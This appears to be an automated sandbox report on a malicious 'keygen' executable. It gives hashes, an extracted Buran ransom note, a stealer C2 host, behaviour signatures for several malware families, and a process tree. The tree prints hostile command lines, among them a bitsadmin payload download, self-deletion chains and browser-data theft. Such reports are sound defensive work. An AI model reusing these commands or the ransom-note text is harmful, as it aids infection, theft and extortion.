Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1801s
  • max time network
    1802s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    27-04-2021 19:43

General

  • Target

    keygen-step-4d.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. To be sure we have the decryptor and it works you can send an email: rootiunik@cock.li and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? Write to email: rootiunik@cock.li Reserved email: TimothyCrabtree@protonmail.com Your personal ID: 1B4-5D5-A92 Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.
Emails

rootiunik@cock.li

TimothyCrabtree@protonmail.com

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • Buran

    Ransomware-as-a-service based on the VegaLocker family first identified in 2019.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detected facebook phishing page
  • ElysiumStealer

    ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • Turns off Windows Defender SpyNet reporting 2 TTPs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Windows security bypass 2 TTPs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • XMRig Miner Payload 2 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 13 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 14 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Suspicious use of SetThreadContext 15 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 33 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 14 IoCs
  • NTFS ADS 2 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 48 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2756
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2744
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2664
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2464
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2432
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1904
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1428
            • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
              "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
              1⤵
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:1440
              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:1220
                • C:\Windows\SysWOW64\rundll32.exe
                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                  3⤵
                  • Loads dropped DLL
                  • Modifies registry class
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:3196
              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:2188
              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:3192
                • C:\Users\Admin\AppData\Local\Temp\is-3I1LB.tmp\Install.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-3I1LB.tmp\Install.tmp" /SL5="$9007C,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:1716
                  • C:\Users\Admin\AppData\Local\Temp\is-OOMIN.tmp\Ultra.exe
                    "C:\Users\Admin\AppData\Local\Temp\is-OOMIN.tmp\Ultra.exe" /S /UID=burnerch1
                    4⤵
                    • Drops file in Drivers directory
                    • Executes dropped EXE
                    • Adds Run key to start application
                    • Drops file in Program Files directory
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:2136
                    • C:\Program Files\VideoLAN\STANZLRJXM\ultramediaburner.exe
                      "C:\Program Files\VideoLAN\STANZLRJXM\ultramediaburner.exe" /VERYSILENT
                      5⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:4060
                      • C:\Users\Admin\AppData\Local\Temp\is-K5ICM.tmp\ultramediaburner.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-K5ICM.tmp\ultramediaburner.tmp" /SL5="$500F4,281924,62464,C:\Program Files\VideoLAN\STANZLRJXM\ultramediaburner.exe" /VERYSILENT
                        6⤵
                        • Executes dropped EXE
                        • Drops file in Program Files directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of WriteProcessMemory
                        PID:2252
                        • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                          "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                          7⤵
                          • Executes dropped EXE
                          PID:4136
                    • C:\Users\Admin\AppData\Local\Temp\c2-3e15f-349-bfa96-d4e4bf1843a7b\Lahosegoni.exe
                      "C:\Users\Admin\AppData\Local\Temp\c2-3e15f-349-bfa96-d4e4bf1843a7b\Lahosegoni.exe"
                      5⤵
                      • Executes dropped EXE
                      • Checks computer location settings
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4212
                    • C:\Users\Admin\AppData\Local\Temp\1b-6eb56-6a4-c3ca3-e2aadc771c40f\Jivedapiba.exe
                      "C:\Users\Admin\AppData\Local\Temp\1b-6eb56-6a4-c3ca3-e2aadc771c40f\Jivedapiba.exe"
                      5⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:4292
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pqeyts2m.ooq\skipper.exe /s & exit
                        6⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4956
                        • C:\Users\Admin\AppData\Local\Temp\pqeyts2m.ooq\skipper.exe
                          C:\Users\Admin\AppData\Local\Temp\pqeyts2m.ooq\skipper.exe /s
                          7⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:4568
                          • C:\Users\Admin\AppData\Local\Temp\1811228514.exe
                            C:\Users\Admin\AppData\Local\Temp\1811228514.exe
                            8⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:3208
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                              9⤵
                                PID:5600
                            • C:\Users\Admin\AppData\Local\Temp\800819106.exe
                              C:\Users\Admin\AppData\Local\Temp\800819106.exe
                              8⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:1240
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                9⤵
                                  PID:5552
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                  9⤵
                                    PID:4188
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\pqeyts2m.ooq\skipper.exe & exit
                                  8⤵
                                    PID:5264
                                    • C:\Windows\SysWOW64\PING.EXE
                                      ping 0
                                      9⤵
                                      • Runs ping.exe
                                      PID:1500
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\z5y42fvy.bzy\001.exe & exit
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4256
                                • C:\Users\Admin\AppData\Local\Temp\z5y42fvy.bzy\001.exe
                                  C:\Users\Admin\AppData\Local\Temp\z5y42fvy.bzy\001.exe
                                  7⤵
                                  • Executes dropped EXE
                                  PID:4924
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o4moazoa.di1\gpooe.exe & exit
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:2284
                                • C:\Users\Admin\AppData\Local\Temp\o4moazoa.di1\gpooe.exe
                                  C:\Users\Admin\AppData\Local\Temp\o4moazoa.di1\gpooe.exe
                                  7⤵
                                  • Executes dropped EXE
                                  • Adds Run key to start application
                                  PID:4260
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    8⤵
                                    • Executes dropped EXE
                                    PID:4836
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    8⤵
                                      PID:5960
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      8⤵
                                      • Executes dropped EXE
                                      PID:5736
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      8⤵
                                        PID:5532
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rxmmmfdy.tgp\google-game.exe & exit
                                    6⤵
                                      PID:636
                                      • C:\Users\Admin\AppData\Local\Temp\rxmmmfdy.tgp\google-game.exe
                                        C:\Users\Admin\AppData\Local\Temp\rxmmmfdy.tgp\google-game.exe
                                        7⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetWindowsHookEx
                                        PID:4772
                                        • C:\Windows\SysWOW64\rundll32.exe
                                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                          8⤵
                                            PID:5436
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\scuarf3d.rt2\md1_1eaf.exe & exit
                                        6⤵
                                          PID:5152
                                          • C:\Users\Admin\AppData\Local\Temp\scuarf3d.rt2\md1_1eaf.exe
                                            C:\Users\Admin\AppData\Local\Temp\scuarf3d.rt2\md1_1eaf.exe
                                            7⤵
                                            • Executes dropped EXE
                                            • Checks whether UAC is enabled
                                            PID:5404
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uk21zton.t0v\HookSetp.exe /silent & exit
                                          6⤵
                                            PID:5252
                                            • C:\Users\Admin\AppData\Local\Temp\uk21zton.t0v\HookSetp.exe
                                              C:\Users\Admin\AppData\Local\Temp\uk21zton.t0v\HookSetp.exe /silent
                                              7⤵
                                              • Executes dropped EXE
                                              PID:5624
                                              • C:\Users\Admin\AppData\Roaming\7844254.exe
                                                "C:\Users\Admin\AppData\Roaming\7844254.exe"
                                                8⤵
                                                • Executes dropped EXE
                                                PID:5328
                                              • C:\Users\Admin\AppData\Roaming\3360130.exe
                                                "C:\Users\Admin\AppData\Roaming\3360130.exe"
                                                8⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Adds Run key to start application
                                                PID:5436
                                                • C:\ProgramData\Windows Host\Windows Host.exe
                                                  "C:\ProgramData\Windows Host\Windows Host.exe"
                                                  9⤵
                                                  • Executes dropped EXE
                                                  PID:360
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3lkuc0i0.ear\askinstall39.exe & exit
                                            6⤵
                                              PID:5632
                                              • C:\Users\Admin\AppData\Local\Temp\3lkuc0i0.ear\askinstall39.exe
                                                C:\Users\Admin\AppData\Local\Temp\3lkuc0i0.ear\askinstall39.exe
                                                7⤵
                                                • Executes dropped EXE
                                                PID:2516
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                  8⤵
                                                    PID:5352
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im chrome.exe
                                                      9⤵
                                                      • Kills process with taskkill
                                                      PID:1844
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\os3x1ggx.wm2\y1.exe & exit
                                                6⤵
                                                  PID:5732
                                                  • C:\Users\Admin\AppData\Local\Temp\os3x1ggx.wm2\y1.exe
                                                    C:\Users\Admin\AppData\Local\Temp\os3x1ggx.wm2\y1.exe
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:204
                                                    • C:\Users\Admin\AppData\Local\Temp\0h8lNnd7jr.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\0h8lNnd7jr.exe"
                                                      8⤵
                                                      • Executes dropped EXE
                                                      • Modifies system certificate store
                                                      PID:6008
                                                      • C:\Users\Admin\AppData\Roaming\1619559916918.exe
                                                        "C:\Users\Admin\AppData\Roaming\1619559916918.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619559916918.txt"
                                                        9⤵
                                                        • Executes dropped EXE
                                                        PID:5960
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\0h8lNnd7jr.exe"
                                                        9⤵
                                                          PID:5732
                                                          • C:\Windows\SysWOW64\PING.EXE
                                                            ping 127.0.0.1 -n 3
                                                            10⤵
                                                            • Runs ping.exe
                                                            PID:4304
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\os3x1ggx.wm2\y1.exe"
                                                        8⤵
                                                          PID:4160
                                                          • C:\Windows\SysWOW64\timeout.exe
                                                            timeout /T 10 /NOBREAK
                                                            9⤵
                                                            • Delays execution with timeout.exe
                                                            PID:3496
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hmhkn5v1.i5r\requête.exe & exit
                                                      6⤵
                                                        PID:6064
                                                        • C:\Users\Admin\AppData\Local\Temp\hmhkn5v1.i5r\requête.exe
                                                          C:\Users\Admin\AppData\Local\Temp\hmhkn5v1.i5r\requête.exe
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:2260
                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            PID:6032
                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                              parse.exe -f json -b edge
                                                              9⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              PID:3952
                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                              parse.exe -f json -b chrome
                                                              9⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              PID:804
                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                              parse.exe -f json -b firefox
                                                              9⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              PID:5892
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\403g2fmn.upp\SunLabsPlayer.exe /S & exit
                                                        6⤵
                                                          PID:5532
                                                          • C:\Users\Admin\AppData\Local\Temp\403g2fmn.upp\SunLabsPlayer.exe
                                                            C:\Users\Admin\AppData\Local\Temp\403g2fmn.upp\SunLabsPlayer.exe /S
                                                            7⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Drops file in Program Files directory
                                                            PID:4992
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdB1BF.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:1028
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdB1BF.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:4736
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdB1BF.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:5128
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdB1BF.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:4444
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdB1BF.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:4364
                                                                        • C:\Windows\System32\Conhost.exe
                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          9⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:5040
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdB1BF.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:3428
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdB1BF.tmp\tempfile.ps1"
                                                                          8⤵
                                                                          • Checks for any installed AV software in registry
                                                                          PID:4876
                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                          "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                          8⤵
                                                                          • Download via BitsAdmin
                                                                          PID:5932
                                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pHlkK8TOjY8FNbWF -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                          8⤵
                                                                          • Executes dropped EXE
                                                                          • Drops file in Program Files directory
                                                                          PID:5704
                                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pqi2C5HpEuJvfOs0 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                          8⤵
                                                                          • Executes dropped EXE
                                                                          PID:5768
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdB1BF.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:5208
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdB1BF.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:3408
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdB1BF.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:5708
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdB1BF.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:4744
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdB1BF.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:5668
                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\orIRpJxOmHOi\orIRpJxOmHOi.dll" orIRpJxOmHOi
                                                                                    8⤵
                                                                                    • Loads dropped DLL
                                                                                    PID:4364
                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\orIRpJxOmHOi\orIRpJxOmHOi.dll" orIRpJxOmHOi
                                                                                      9⤵
                                                                                      • Loads dropped DLL
                                                                                      • Drops file in System32 directory
                                                                                      • Drops file in Program Files directory
                                                                                      PID:4408
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdB1BF.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                    • Drops file in Program Files directory
                                                                                    PID:1956
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdB1BF.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:4420
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdB1BF.tmp\tempfile.ps1"
                                                                                      8⤵
                                                                                      • Drops file in Program Files directory
                                                                                      PID:4124
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdB1BF.tmp\tempfile.ps1"
                                                                                      8⤵
                                                                                        PID:5252
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdB1BF.tmp\tempfile.ps1"
                                                                                        8⤵
                                                                                          PID:4800
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            9⤵
                                                                                              PID:3496
                                                                                          • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                            "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            PID:5008
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zy4hlav1.e41\005.exe & exit
                                                                                        6⤵
                                                                                          PID:5656
                                                                                          • C:\Users\Admin\AppData\Local\Temp\zy4hlav1.e41\005.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\zy4hlav1.e41\005.exe
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5284
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4pojfgic.gr0\GcleanerWW.exe /mixone & exit
                                                                                          6⤵
                                                                                            PID:4804
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gnu5qtjb.nu1\toolspab1.exe & exit
                                                                                            6⤵
                                                                                              PID:5608
